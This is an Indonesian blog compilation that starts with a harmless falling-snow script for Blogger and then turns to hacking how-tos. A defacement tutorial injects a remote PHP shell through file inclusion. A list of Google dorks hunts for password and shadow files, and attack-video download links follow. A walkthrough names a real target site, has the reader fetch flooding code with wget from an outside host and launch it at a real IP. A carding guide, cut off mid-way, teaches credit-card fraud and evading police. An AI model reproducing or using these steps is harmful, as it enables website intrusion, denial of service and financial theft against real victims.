Hujan Salju Di blogger

by younuzes

Apakah anda melihat ada sesuatu yang berbeda di blog saya? , ya butir butir putih layaknya salju berjatuhan . Ini adalah javascript yang menarik yang saya dapat dari http://www.green-hacker.org . Apakah anda berpikir untuk menggunakannya langsung saja mencopykan script tersebut di “edit html” pada blogspot . Apabila itu yang anda lakukan maka pesan error dari blogspot yang anda dapat , oleh karena itu ikuti langkah saya dalam menggunakannya di blogspot .
disini ada dua bagian script yang akan diletakan di <head> , dan yang satu lagi diletakan diantara <body> . berikut scriptnya .

langkah pertama :
-letakan script berikut ini di antara tag <head>

————————————————————
<style type="text/css">

.snow {
position:absolute;
layer-background-color:lightblue;
visibility:visible;
top:-50px;
font-size:1px;
background-color:lightblue;
}

</style>

————————————————————

Langkah ke dua :
-Letakan script berikut d antara tag <body>

————————————————————
<script language="javascript">

var snowflakes=50; //NUMBER OF OBJECTS YOU WANT.
var level=2; //SPEED LEVEL 1 to 5. 1=SLOWER, 5=FASTER

var w3c=(document.getElementById)?true:false;
var ns4=(document.layers)?true:false;
var ie4=(document.all && !w3c)?true:false;
var ie5=(document.all && w3c)?true:false;
var ns6=(w3c && navigator.appName.indexOf("Netscape")>=0)?true:false;
var t='';
var w_x, w_y;
var snow=new Array();
for(i=1;i<=snowflakes;i++)t+='<div id="snow'+i+'" class="snow"></div>';
document.write(t);

function getstartpos(obj){
obj.size=Math.floor(Math.random()*5)+1
obj.ystep=obj.size*level;
obj.xstep=obj.ystep/5;
if(ns4)obj.clip.width=obj.clip.height=obj.size;
else obj.style.width=obj.style.height=obj.size;
moveidto(obj,Math.floor(Math.random()*w_x)-obj.size,0);
}

function movedrop(){
for(i=1;i<=snowflakes;i++){
var l=(ns4)?snow[i].left:parseInt(snow[i].style.left);
var t=(ns4)?snow[i].top:parseInt(snow[i].style.top);
var pxo=(ie4||ie5)?document.body.scrollLeft:pageXOffset;
var pyo=(ie4||ie5)?document.body.scrollTop:pageYOffset;
if( (t+snow[i].ystep+snow[i].size>=w_y+pyo) || (snow[i].xpos-snow[i].size<pxo)) getstartpos(snow[i]);
else moveidto(snow[i], l-snow[i].xstep, t+snow[i].ystep);
}}

function getwindowdims(){
w_x=(ie4||ie5)? document.body.clientWidth:window.innerWidth;
w_y=(ie4||ie5)? document.body.clientHeight:window.innerHeight;
}

function moveidto(id,x,y){
if(ns4)id.moveTo(x,y);
else{
id.style.left=x+'px';
id.style.top=y+'px';
}}

window.onresize=function(){
if(ns4)setTimeout('history.go(0)',400);
else getwindowdims();
}

window.onload=function(){
level=Math.max(Math.min(5,level),1)
getwindowdims();
for(i=1;i<=snowflakes;i++){
snow[i]=(ns4)?document.layers['snow'+i]:(ie4)?document.all['snow'+i]:document.getElementById('snow'+i);
getstartpos(snow[i]);
moveidto(snow[i],Math.floor(Math.random()*(w_x-10)),Math.floor(Math.random()*(w_y-10)));
}
setInterval('movedrop()',50);
}
</script>
————————————————————

Masuklah ke blogspot.com lalu login . Masuk ke tata letak , lalu pilih edit html . centang expand template widget . buka jendela baru masuklah ke website http://blogcrowds.com/resources/parse_html.php , lalu copy script pertama lalu klik tombol “parse” . setelah selesai copy script yang tadi sudah di parse lalu paste kan script tersebut tepat diantara tag </head> .
lakukan hal yang sama pada script yang kedua , lalu paste kan hasilnya tepat dia atas tag </body> . Setelah itu klik save template . Lalu lihat hasilnya , apabila belum efek belum keluar coba gunakan internet explorer .

Google hacks tool

oleh younuzes

alow semua gw pengen kasih tau tool yang lumayan bagus namanya google hack.

oh gw peringatin sama kayak yang ada di beberapa blog ,yang udah pinter mending jauh2 dari artikel ini soalnya nih kan cuma artikel goblok yang di tulis ama orang goblok so cepat kabur.oh ya gw minta maaf klo tulisan nya gak rapih dan sering ngelantur kemana – mana . selanjutnya silahkan baca

Google hack tools merupakan aplikasi untuk melakukan google hacking tanpa perlu repot-repot menulis nya di google , bahkan dengan google hack kita dapat mencari password dengan metode- metode tertentu yang disediakan seperti password modified,auth_user_file.txt,passlist.txt,frontpage,config.php,dan inline url password.selain buat cari password google hacks juga buat cari book,aplication,lyrics,torrent dan laen2 sama halnya kaya kita naruh skrip google hacking di google , tapi lebih gampang aja soalnya tampilannya gui.

Waktu gw pake pilihan cache trus gw coba taro url jasakom.com , eh gw diajak ke website http://web.archive.org/ disitu ada archive – archive atao halaman – halaman jasakom dari tahun ke tahun

nih gambarnya

jasakom-arcive1

jasakom-arcive1

lumayan kan bisa ngeliat tampilan jasakom yang masih jadul dan dapet artikel yang jadul pula kaya begini nih tampilan jasakom bulan mei tahun 2001

jasakom-mei-2001

jasakom-mei-2001

dah pokoknya lumayan dah buat kalian yang males ngetik tapi pengen ngelakuin google hacking , pokoknya banyak deh fungsi google hacks yang penting kreativ , klo mo serius beneran ngelakuin google hacking beli aja bukunya Efvy zam Kerinci , ada yang google hacking , dan ada yang reloaded tapi gw punyanya yang reloaded doank sih . ngomong2 katanya pengen ada google hacking yang revolution kira kapan ya, soalnya ampe sekarang gw blom ngeliat di toko buku.

Udah ah kok ngomong nya jadi kemana2 sih sori gw bukan penulis yang baik karena nilai bahasa indonesia gw pas-pas an

nih link download nya

Cara Deface Yang Nyaman

from bestfuture.wordpress.com

Singgih Kumoro says:

Tutorial Cara deface yang Nyaman dan Enak Tenan …
1. Buka http://www.milw0rm. com
2. klik Search
3. ketik RFI (Remote File Inclusion)
4. Cari Exploit terbaru atau CMS/Aplikasi yang terkenal
5. Buka Google, dan liat Advisor yang kita pilih tersebut
6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut,
* Jika tidak gunakanlah Judul dari Exploit tersebut
7. Setelah dapat hasil dari Google, klik kanan Open NewTab [Nah ini
untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB]
8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu
rasa penuh Browsernya
9. Coba satu persatu dari hasil tersebut dengan Exploit Command yang
terdapat di advisor
10. Jika terjadi pesan error, cari Pesan error yang menyatakan
kegagalan File Inclusion, bukan File Not Found.
11. Jika menemukan File Not Found kemungkinan; salah Relative Path
dari Site tersebut, atau memang beda versi, dan kemungkinan lain.
12. Jika menemukan pesan error dari File Inclusion, atau Blank Putih
tanpa Pesan Error,
13. Ganti command exploit setelah tanda ‘=’[sama dengan] dengan
http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif]
14. Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan
menampilkan PHPShell r57shell atau hanya Blank Page, dan muncul
kembali File Inclusion
15. Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke
pencarian File dan Direktory yang memiliki full akses atau -rwxrwxrwx
/ -rw-rw-rw <– untuk file | drwxrwxrwx / drw-rw-rw <– untuk direktory
16. Jika telah mendapatkan file atau direktory diatas tersebut, kamu
bisa mengupload file index.html versi buatan kamu, atau mengubah
index.php or .html dengan versi code kamu jgn lupa nama decoding
dikibarkan disana…
17. Setelah merubah file tersebut. Coba kamu lihat di browser sesuai
dengan relatife path yang kamu ubah tadi (Original post by ping_win)

brain Says:

from bestfuture.wordpress.com

brain Says:
Nopember 15, 2007 at 6:00 am

In the Realm of the Hackers (Documentary)
http://rapidshare.com/files/40916035/nh.part1.rar
http://rapidshare.com/files/40903132/nh.part2.rar
http://rapidshare.com/files/40906125/nh.part3.rar
http://rapidshare.com/files/40909207/nh.part4.rar
http://rapidshare.com/files/40912085/nh.part5.rar

Hacking Democracy (2007)
http://rapidshare.com/files/23815192…hdem.part1.rar
http://rapidshare.com/files/23818185…hdem.part2.rar
http://rapidshare.com/files/23823373…hdem.part3.rar
http://rapidshare.com/files/23825868…hdem.part4.rar
http://rapidshare.com/files/23829197…hdem.part5.rar
http://rapidshare.com/files/23831979…hdem.part6.rar
http://rapidshare.com/files/23834615…hdem.part7.rar
http://rapidshare.com/files/23835168…hdem.part8.rar
Password: warezdonkey.com

HACKERS 2 : Takedown
http://rapidshare.com/files/18506338….Def.part1.rar
http://rapidshare.com/files/18506660….Def.part2.rar
http://rapidshare.com/files/18506941….Def.part3.rar
http://rapidshare.com/files/18507254….Def.part4.rar
http://rapidshare.com/files/18507530….Def.part5.rar
http://rapidshare.com/files/18507875….Def.part6.rar
http://rapidshare.com/files/18508165….Def.part7.rar

Hackers 2 – Operation Takedown
http://rapidshare.com/files/19967316…art01.rar.html
http://rapidshare.com/files/19995600…art02.rar.html
http://rapidshare.com/files/20114232…art03.rar.html
http://rapidshare.com/files/20157302…art04.rar.html
http://rapidshare.com/files/20275454…art05.rar.html
http://rapidshare.com/files/20283508…art06.rar.html
http://rapidshare.com/files/20316475…art07.rar.html
http://rapidshare.com/files/20436763…art08.rar.html
http://rapidshare.com/files/20442088…art09.rar.html

hackers1:
http://rapidshare.com/files/30661378….By.Deejam.001
http://rapidshare.com/files/30661380….By.Deejam.002
http://rapidshare.com/files/30661357….By.Deejam.003
http://rapidshare.com/files/30661370….By.Deejam.004
http://rapidshare.com/files/30661376….By.Deejam.005
http://rapidshare.com/files/30661367….By.Deejam.006
http://rapidshare.com/files/30661348….By.Deejam.007

Hackers – 23
http://rapidshare.com/files/30661394….By.Deejam.001
http://rapidshare.com/files/30661396….By.Deejam.002
http://rapidshare.com/files/30661391….By.Deejam.003
http://rapidshare.com/files/30661404….By.Deejam.004
http://rapidshare.com/files/30661418….By.Deejam.005
http://rapidshare.com/files/30661399….By.Deejam.006
http://rapidshare.com/files/30661409….By.Deejam.007
http://rapidshare.com/files/30661237….By.Deejam.008

Hackers – 3 Antitrust
http://rapidshare.com/files/30661438….By.Deejam.001
http://rapidshare.com/files/30661441….By.Deejam.002
http://rapidshare.com/files/30661428….By.Deejam.003
http://rapidshare.com/files/30661440….By.Deejam.004
http://rapidshare.com/files/30661432….By.Deejam.005
http://rapidshare.com/files/30661429….By.Deejam.006
http://rapidshare.com/files/30661423….By.Deejam.007
http://rapidshare.com/files/30661301….By.Deejam.008
Password warpboy

Hackers – 2 TakeDOwn
http://rapidshare.com/files/30660589…nyus.part1.rar
http://rapidshare.com/files/30660607…nyus.part2.rar
http://rapidshare.com/files/30660587…nyus.part3.rar
http://rapidshare.com/files/30660608…nyus.part4.rar
http://rapidshare.com/files/30660580…nyus.part5.rar
http://rapidshare.com/files/30660614…nyus.part6.rar
http://rapidshare.com/files/30660584…nyus.part7.rar

New York City Hackers
http://rapidshare.com/files/30660537…kers.part1.rar
http://rapidshare.com/files/30660549…kers.part2.rar
http://rapidshare.com/files/30660540…kers.part3.rar
http://rapidshare.com/files/30660547…kers.part4.rar
http://rapidshare.com/files/30660863…kers.part5.rar

Hackers 1 [1995] (DVDRip + Screencaps)
http://rapidshare.com/files/43169829…_-_1.part1.rar
http://rapidshare.com/files/43171085…_-_1.part2.rar
http://rapidshare.com/files/43172212…_-_1.part3.rar
http://rapidshare.com/files/43173296…_-_1.part4.rar
http://rapidshare.com/files/43174427…_-_1.part5.rar
http://rapidshare.com/files/43175531…_-_1.part6.rar
http://rapidshare.com/files/43175891…_-_1.part7.rar

Hackers 3 – Antitrust [2001] (DVDRip + Screencaps)
http://rapidshare.com/files/43177153…_-_3.part1.rar
http://rapidshare.com/files/43178497…_-_3.part2.rar
http://rapidshare.com/files/43179968…_-_3.part3.rar
http://rapidshare.com/files/43181402…_-_3.part4.rar
http://rapidshare.com/files/43182867…_-_3.part5.rar
http://rapidshare.com/files/43184273…_-_3.part6.rar
http://rapidshare.com/files/43185677…_-_3.part7.rar

Efvy Zam Kerinci Says:

Efvy Zam Kerinci Says:
Nopember 15, 2007 at 4:19 am

Seorang hacker sejati adl org yg gak mudah menyerah n slalu kreatif.qt byk denger byk web dibobol ato disusupi ato dirusak hacker.mgkn qt bpikir mrk pasti pny tools khusus hacker.Mmg sbgian hacker mnggunakan tools khusus tp sbgian lg ckp mggnkn search engines dlm mlak aksinya dg mndsrkn pd code syntax khusus.

ini basic dari syntax/keyword :

“Index of /admin”
“Index of /password”
“Index of /mail”
“Index of /” +passwd
“Index of /” +password.txt
“Index of /” +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index

allintitle: “index of/admin”
allintitle: “index of/root”
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

inurlasswd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:”auth_user_file.txt”
inurl:”wwwroot/*.”

top secret site:mil
confidential site:mil

allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history

intitle:”Index of” .sh_history
intitle:”Index of” .bash_history
intitle:”index of” passwd
intitle:”index of” people.lst
intitle:”index of” pwd.db
intitle:”index of” etc/shadow
intitle:”index of” spwd
intitle:”index of” master.passwd
intitle:”index of” htpasswd
intitle:”index of” members OR accounts
intitle:”index of” user_carts OR user_cart

*biasanya para pemula melakukan aksinya dg mencoba2x menghacking situs2x web acak yg kbetulan situs web tsb kurang kreatif dlm mnempatkn “file code syntax” dlm suatu folder yg umum digunakan.
tp bg yg PROFESIONAL mrk pny target khusus situs mana yg bakalan dihacking.SMUA KEMBALI PD KEKREATIFITASAN DAN TDK MUDAH MNYERAH.

di post oleh bestfuture.wordpress.com

Berikut adalah kumpulan video hacker yang bisa didownload lengkap dengan banyak tutorialnya dari forumnya mas Jiddigaul. Langsung aja download.

  1. DeluxeBB 1.06 Exploit (9mb) Remote SQL Injection Exploit http://rapidshare.com/files/11156227/100_live585.rar
  2. NetBios Live Hack (5mb) Shows how to use Super Scan to Hack Netbios opened on remote PC (Port 139) http://rapidshare.com/files/11158778/101_netbios585.rar
  3. Classified (7mb) Shows how site classified is Hacked. http://rapidshare.com/files/11158779/102_site585.rar
  4. NASA (2mb) NASA Department website Hacked. http://rapidshare.com/files/11158865/92_meh.zip
  5. Linux Network Monitor (5mb) This video shows you how to set up ntop, a network monitoring program, on GNU/Linux. Ntop features a web interface that displays tons of information about bandwidth utilization, traffic patterns, etc. It even shows you what applications are using bandwidth on your network such as ftp, bittorrent, http, dns, etc http://rapidshare.com/files/11158774/95_CBT4Free-Linux_Network_Monitor.zip
  6. Linux DNS Server (11mb)  This video explains how to set up a DNS server on a GNU/Linux server. In the video I explain a little bit about how DNS works, then I install and configure BIND in a chroot jail on 2 DNS servers in a master/slave relationship. This video is specifically tailored to setting up DNS for a web server. http://rapidshare.com/files/11158808/97_CBT4Free-Linux_DNS_Server.zip
  7. Windows Web Server (6mb) This video details the installation and configuration of Apache, MySQL, and PHP on Windows. This video is made specifically or those using Windows 2000 Pro, Windows XP Home, or Windows XP Pro. http://rapidshare.com/files/11158787/98_Windows_Web_Server.zip
  8. Win Server 2003 IIS and DNS (4mb) This video shows how to install and configure IIS and DNS on Windows Server 2003 for virtual hosting. These procedures will work with all versions of Windows Server 2003 and possibly with Windows 2000 Server. http://rapidshare.com/files/11158780/99_Windows_Server_2003_IIS_and_DNS.zip
  9. Hacker Defender Movie (8mb) Shows how Brilliant Hacker defender bypasses several rootkits detectors. You can see bypassing IceSword, BlackLight, RootkitRevealer and more. http://rapidshare.com/files/11158766/90_Brilliant_Hacker_defender_presentation_movie_MSV1.rar
  10. 0-DAY Simple SQL Injection (8mb) A film project about a cracker with the name zer0day. (Hacking with Linux -php) http://rapidshare.com/files/11158799/89_simple-sql-injection.zip
  11. wbb (10mb) wbb portal hacked by XSS http://rapidshare.com/files/11158816/82_wbb_portal.rar
  12. Reverse Engineering (20mb) Reverse Engineering with LD PRELOAD http://rapidshare.com/files/11158857/83_reverse.rar
  13. SWF File Vulnerability Multiple Websites Embedded SWF File Vulnerability Demonstration http://rapidshare.com/files/11158813/84_SWF_Vul_Demo.rar
  14. IPB 1.3 SQL (10mb) Invasion Power Board 1.3 SQL Injection Exploit http://rapidshare.com/files/11158768/86_IPB_SQL.rar
  15. Qnix Buffer Overflows (11mb) Qnix Demonstrating Exploration of Simple Buffer Overflows http://rapidshare.com/files/11158770/87_buff.rar
  16. ASP SQL (5mb)  Simple ASP Administrator SQL Injection (5mb) http://rapidshare.com/files/11158795/88_asp_sql.rar
  17. Blind MySQL (9mb) Demonstration of Blind MySQL Injection (bsqlbf) http://rapidshare.com/files/11158804/77_Blind_MySQL.rar
  18. D-Link Wireless (3mb)  Intruders D-Link Wireless Access Point Configuration Disclosure http://rapidshare.com/files/11158777/78_D-Link_Wireless.rar
  19. Mysql bftools (8mb) Demonstration of Blind MySQL Injection (mysql_bftools)  http://rapidshare.com/files/11158798/79_mysql_bftools.rar
  20. PHP Remote File (9mb) PHP Remote File Inclusion Windows Backdoor. http://rapidshare.com/files/11158805/80_PHP_Remote.rar
  21. Cracking WEP in 10 Minutes (30mb) A short demo of a wireless WEP attack. This is an interesting technique, where packets are injected to the access point, making it release weak IVs. You’ll think twice about WEP after this http://rapidshare.com/files/11158904/75_see-sec-wepcrack.zip
  22. Tunneling Exploits via SSH (18mb)  An intensive demo showing how SSH Tunneling techniques can be used to exploit an interal, non routable network. http://rapidshare.com/files/11158855/74_see-sec-ssh-dcom-tunneling.zip
  23. A classic client side attack (18mb)  The MS06-001 vulnerability was used to execute a reverse connect shellcode. More information about this vulnerability can be found at the Microsoft site – MS06-001. http://rapidshare.com/files/11158860/76_see-sec-client-side.rar
  24. C++ Video tutorials (29mb) Nice C/C++ Shockwave videos. http://rapidshare.com/files/11158892/70_C__.rar
  25. Interview with Kevin Mitnick (12mb) He was on fbi’s most wanted list, a nitrous Hacker but now see Kevin’s Interview after being freed what he has to say about his past and future. http://rapidshare.com/files/11158829/68_kevin.rar
  26. Unix Shell Fundamentals (40mb) VTC Unix Shell Fundamentals Video Tutorials. You need Quicktime player to view the videos. http://rapidshare.com/files/11158906/69_UnixShellFund.rar
  27. Microsoft.com Bugs, Nice videos shows of old bug that was exploited on the site. http://rapidshare.com/files/11164765/67_MICROSOFT.rar
  28. Bitfrost Server Crypting (15mb) This is nice video for any one learning how to add bytes to make there server undetectable. The rar Password is Crypt http://rapidshare.com/files/11164849/66_Bifrost_Server_Cryp.rar
  29. WMF File Code Execution Vulnerability With Metasploit (38mb) This video covers the use of the recent (Jan 2006) WMF file code execution vulnerability with Metasploit. It shows how to shovel a shell back to the attacker with the WMF vulnerability. See Microsoft Security Advisory 912840. Thanks to kn1ghtl0rd, AcidTonic, Electroman and livinded for their help. http://rapidshare.com/files/11164775/50_metasploitwmf.swf
  30. SSH Dynamic Port Forwarding (30mb) I set up a quick video tutorial to show how to set up an encrypted tunnel using SSH’s dynamic port forwarding (sort of a poor man’s VPN) in both Linux and Windows. The tools used are OpenSSH, PuTTY and Firefox, but it should be enough info to allow you to figure out how to set up other clients http://rapidshare.com/files/11164778/51_sshdynamicportforwarding.swf
  31. Using VMware Player to run Live CDs (Bootable ISOs) (46mb) In this video I show how to use the free VMware Player to run Live CDs like Knoppix, Auditor or Bart’s PE Builder from an ISO http://rapidshare.com/files/11164810/52_vmwareplayerlivecd.swf
  32. Adding Modules to a Slax or Backtrack Live CD from Windows (43mb) http://rapidshare.com/files/11164807/53_myslax.swf
  33. Make your own VMs with hard drive for free: VMware Player + VMX Builder (16mb) http://rapidshare.com/files/11164773/54_vmxbuilder.swf
  34. Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text.info (44mb) http://rapidshare.com/files/11164795/55_backtrackplaintext.swf
  35. Droop’s Box: Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools (67mb) http://rapidshare.com/files/11164818/44_droops1.swf
  36. WiGLE, JiGLE and Google Earth: Mapping out your wardrive (72mb) http://rapidshare.com/files/11164827/45_wigle1.swf
  37. Finding Rogue SMB File Shares On Your Network (60mb) http://rapidshare.com/files/11164821/46_roguefileshares.swf
  38. Nmap Video Tutorial 2: Port Scan Boogaloo (13mb) This video covers some intermediate and advanced Nmap options and is a follow-up to “Basic Nmap Usage” presentation. http://rapidshare.com/files/11164843/47_nmap2.swf
  39. Metasploit Flash Tutorial. This video covers the use of Metasploit, launched from the Auditor Boot CD, to compromise an unpatched Windows XP box by using the RPC DCOM (MS03-026) vulnerability. It then sends back a VNC session to the attacker. This is just one example of the many things Metasploit can do. http://rapidshare.com/files/11164788/48_metasploit1.swf
  40. Using VirtualDub and a cheap webcam as a camcorder (10mb) I thought this might be of use to those that would like to submit something to Infonomicon TV or Hack TV but lack the cash for a proper MiniDV camcorder. http://rapidshare.com/files/11164832/49_cheapcamcorder.avi
  41. Cracking Syskey and the SAM on Windows Using Samdump2 and John (25mb) http://rapidshare.com/files/11164783/37_samdump2auditor.swf

Tembak IP Orang

tulisan ini ditulis oleh bestfuture.wordpress.com

Langkah pertama kita harus punya server yang siap inject [jika belum punya cari aja di Google. Berikut ini triksnya th3sn0wbr4in sedikit target dan bug-bug yang mudah-mudahan masih bisa dipake di sini. Untuk contoh ini dipakai Bug PHPLiveHelper dan Keyword untuk mencari targetnya di Google aku coba searching memakai
allinurl:"/PHPLiveHelper/*.php" akhirnya dapat salah satu hasil pencarian dari Google, yaitu http://www.maldivesrds.com/phplivehelper/mail.php?ipadd=219.83.4.68&PHPSESSID=accdc7e62171c549536495 c2b40a5dd3&department=1&livename=

Hapus tulisan /mail.php?ipadd=219.83.4.68&PHPSESSID=accdc7e62171 c549536495c2b40a5dd3&department=1&livename=  dan tambahkan Bug dibelakang alamat URL targetnya, sehingga alamat targetnya menjadi:
http://www.maldivesrds.com/phplivehe...4in/tusuk.htm?

Nah...bisa di-inject kan...? Kita lihat UID - nya adalah nobody(99), Tidak masalah ...
Cari Direktory yang bisa ditulis sama user nobody. Seperti biasa, ketik command linuxnya. Coba ketik find / -type d -perm 777 atau find / -type d -user nobody . Nah, nanti banyak tuch yang keluar...

/* Maksud dari command 1 di atas adalah untuk mencari dari Directory paling atas '/' tipenya Directory, dengan permisi 777 (rwx) untuk siapapun, termasuk user nobody */
/* Maksud dari command 2 di atas adalah untuk mencari dari Directory paling atas '/' tipenya Directory, milik user nobody. Karena pemilik Directory bisa melakukan apapun pada Directory miliknya */

Cari dibelakangnya tidak  ada tulisan Permission Denied, copy dan paste di paste di Field Directory di PHPShell kamu dan [Enter]. Kalau semua ada tulisan Permission Denied, coba saja Directory /tmp, karena biasanya bermode 777.

Download file untuk tembak dengan menggunakan wget. Ketikan wget http://freewebs.com/th3sn0wbr4in/tembak.c. Jika wget tidak bisa digunakan (Command not found atau denied) gunakan lwp-download. Ketik lwp-download  http://freewebs.com/th3sn0wbr4in/tembak.c dan [Enter] aja langsung. Kalau anda menggunakan wget akan keluar keterangan di PHPShell lo, +- seperti ini :

–02:39:51– http://freewebs.com/th3sn0wbr4in/tembak.c => `tembak.c’
Resolving freewebs.com… 38.119.100.2
Connecting to freewebs.com[38.119.100.2]:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 3,744 [text/x-csrc]
0K … 100% 30.89 KB/s
02:39:51 (30.89 KB/s) – `Sambit.c’ saved [3764/3764]

Nah, kalau udah muncul tulisan saved berarti udah kedownload filenya… Compile file tembak.c tadi biar jadi file Executeable (kalau di WinDo$t Ekstensinya .exe kalau di Linux
tidak menggunakan Ekstensi). Ketik:  gcc tembak.c -o tembak
Maksud Command di atas adalah menjalankan gcc, compile file tembak.c (Source Code C) dengan Output file bernama tembak. Jadi nama tembak bisa lo ganti sesuai selera.
Nah…sekarang, jalankan file tembak tadi. Ketikkan :

-      ./tembak 219.83.4.68 80
-      ./ adalah Directory tempat kita menaruh file tembak
-      219.83.4.68 IP Warnet tempat gw maen
-      80 No Port. 80 untuk HTTP a.k.a Browsing

selain file tembak.c bisa juga memakai file upload-an berikut: http://malanghack.net/alat/udp.txt

Silahkan bereksperimen. Thank to th3sn0wbr4in

Seni Carding

tulisan ini dipost oleh bestfuture.wordpress.com

Keingintahuan anda tentang bagaimana sih caranya mendatangkan barang carding dengan sukses. Banyak orang (terutama newbies/pemula) yang mencoba carding hanya dari coba-coba saja, atau mungkin hasil mendengar pembicaraan orang lain kemudian ingin mencoba sendiri dan akhirnya gagal. Anda lupa kalau carding itu selain nikmat, tegang juga beresiko tinggi. Mungkin nama baik anda akan dipertaruhkan disini. Saya bukan bermaksud menakut-nakuti anda. Tujuan informasi tentang resiko ini adalah supaya kita belajar untuk lebih berhati-hati dalam melakukan operasi carding.

Topik pertamaku adalah Psikologi Carding! Mengapa psikologi sangat penting dalam carding, bahkan diletakkan pada posisi no. 1 (artinya mutlak harus dilakukan!) ? Dalam dunia nyata sehari-hari, jika anda datang ke sebuah toko yang menjual mobil atau mungkin barang mewah, dengan mengenakan kaos t-shirt (bukan merk terkenal) sandal jepit dan kendaraan yang anda gunakan adalah angkot atau mungkin becak. Kira-kira anda bisa membayangkan atau tidak wajah si penjual jika anda menyodorkan sebuah kartu kredit untuk membayar barang mewah tadi ? Kira-kira si penjual tadi percaya apa tidak sama kartu kredit anda ? Mungkin kalau dia percaya, itu sebatas 5 menit. Sebab 5 menit berikutnya dia akan menelepon bank untuk mengecek keaslian data kartu kredit anda. Dan dalam hitungan detik berikutnya, dia akan menelepon polisi. Bagaimana jika anda datang ke toko tadi dengan naik mobil (mungkin sedan) yang mewah, Jam tangan merk terkenal, berdasi dan memakai pakaian layaknya seorang boss besar, dengan wangi parfum yang mewah. Aku yakin jika dia membeli barang mewah dengan menyodorkan sebuah cek kosong atau kartu kredit palsu sekalipun, si penjual pasti akan menerima sambil tersenyum bahagia.

Karena carding = penipuan (fraud), maka didalam carding pasti ada unsur penipuan. Dan menipu yang paling berhasil ada kaitannya dengan penampilan. Sebab pada dasarnya setiap manusia didunia yang fana ini lebih menghargai penampilan. Dengan kata lain, penampilan dalam carding harus diutamakan! Bagaimana wujud penampilan fisik dalam dunia cyber ? Berhubung yang namanya dunia cyber (internet) itu tidak ada proses bertemunya penjual dan pembeli secara fisik, maka cara untuk melakukan komunikasi dalam dunia cyber adalah menggunakan email.

Jadi email menempati posisi no. 1 dalam urusan penampilan di dunia cyber! Bayangkan! Jika anda membeli barang contohnya seperti 4 buah laptop AMD Athlon-XP 2600 MHz melalui cyber (internet) dengan cara pembayaran kartu kredit.

Bagi si penjual, hal ini menandakan bahwa konsumennya memiliki cukup banyak dana dan mungkin anda seorang businessman yang berhasil di Indonesia. Tapi yang bikin heran si penjual adalah anda melakukan transaksi online tadi dengan menggunakan free email (email gratisan). Bayangkan, seorang kaya dan memiliki karir yang bagus dan mungkin punya perusahaan, tapi cara kerjanya tidak menampilkan seseorang yang memiliki karir bagus.

Sebab yang namanya free email atau email gratisan itu rentan dengan kelemahan (tidak secure/ tidak aman). Sehingga rasanya tidak mungkin sekali jika anda benar-benar pemilik kartu kredit tadi yang sesungguhnya. Dengan kata lain, jika anda memiliki kartu kredit milik anda sendiri dan anda melakukan transaksi online, tentu seharusnya anda akan lebih berhati-hati dalam bertransaksi, tentu anda tidak akan sembarangan menggunakan email gratisan atau free email. Karena ini menyangkut keamanan data anda sendiri. Jadi pertanyaan yang mungkin muncul di benak si penjual adalah “Benarkah anda pemilik asli dari kartu kredit yang digunakan untuk transaksi barang ini ?”, karena anda menggunakan email gratisan atau free email sebagai penampilan fisik anda.

Kesimpulan !

Untuk melakukan operasi carding, anda harus memiliki sebuah email atau beberapa email (terserah anda) KHUSUS UNTUK CARDING. Dan persyaratan email tadi adalah :

  1. Gunakan email bayar. Contohnya seperti aku –>> presiden@joeylodong.net anda bisa membelinya di http://www.register.com
  2. Karena anda benar-benar pemula dan anda tidak tahu bagaimana mengorder sebuah email bayar, anda bisa menggunakan sebuah email gratisan (free email) yang jarang terdengar atau jarang terlihat oleh orang lain. Kalau yahoo.com, mungkin semua orang didunia ini sudah tahu tentang yahoo.com. Carilah free email yang orang lain tidak tahu. Anda bisa mencarinya sendiri di http://www.emailaddresses.com
  3. Aturan konfigurasi email.  Jika anda menggunakan email bayar Nama domain = nama perusahaan fiktif anda misalnya : perusahaan fiktif anda bernama PT. Java Supermall maka nama domain anda adalah : www.java-supermall.net atau www.java-supermall.biz (soal jenis domainnya terserah anda, mau .biz , .net , .com dll), kemudian username-nya jangan menggunakan nama orang, contohnya : manager@java-supermall.biz, accounting@java-supermall.biz dll. – Jika anda menggunakan email gratisan (free email) usernamenya jangan menggunakan nama orang, tapi gunakanlah nama perusahaan, misalnya : javamall@runbox.com, javasupermall@graffiti.net, dll

Karena resiko yang akan anda hadapi adalah sangat besar sekali, maka mau tidak mau anda memerlukan sebuah atau beberapa buah tips/trik, supaya anda bisa mengelak atas setiap tuduhan yang mungkin akan sampai di hadapan anda.

== Tips/Trik 1 ==

Pastikan anda sudah menyamarkan IP komputer anda. Mengapa perlu disamarkan ? supaya orang lain (dalam hal ini toko online / e-commerce) menganggap transaksi yang anda dilakukan, tidak berasal dari komputer anda. Jadi bahwa bukan anda yang melakukan transaksi.

Tentang menyamarkan IP komputer,anda bisa membacanya sendiri di http://www.joeylodong.net/.com/.org/.info/.biz , disitu sudah dijelaskan secara sejelas-jelasnya yang aku bisa. Perlu untuk anda ketahui bahwa 80 % e-commerce (toko online) tidak memiliki sistem pengecekan IP secara otomatis. Biasanya yang memiliki pengecekan IP adalah e-commerce jenis e-currency contohnya paypal.com, electrumx.com, cashculture.com dan lain-lain. Atau kalau nggak site yang menjual atau memberikan informasi tentang keamanan web, contohnya seperti foundstone inc.

Dengan kata lain, anda tidak perlu ketakutan atas ancaman dilaporkannya ke FBI. Sebab tanpa bukti, sangat susah untuk mengurus laporan tersebut.

Apalagi untuk menangkap seseorang di Indonesia, prosedur atau birokrasi yang digunakan sangat sulit dan berbiaya tinggi, belum tentu e-commerce tadi mau menanggung biaya birokrasinya. So jangan takut!

== Tips/Trik 2 ==

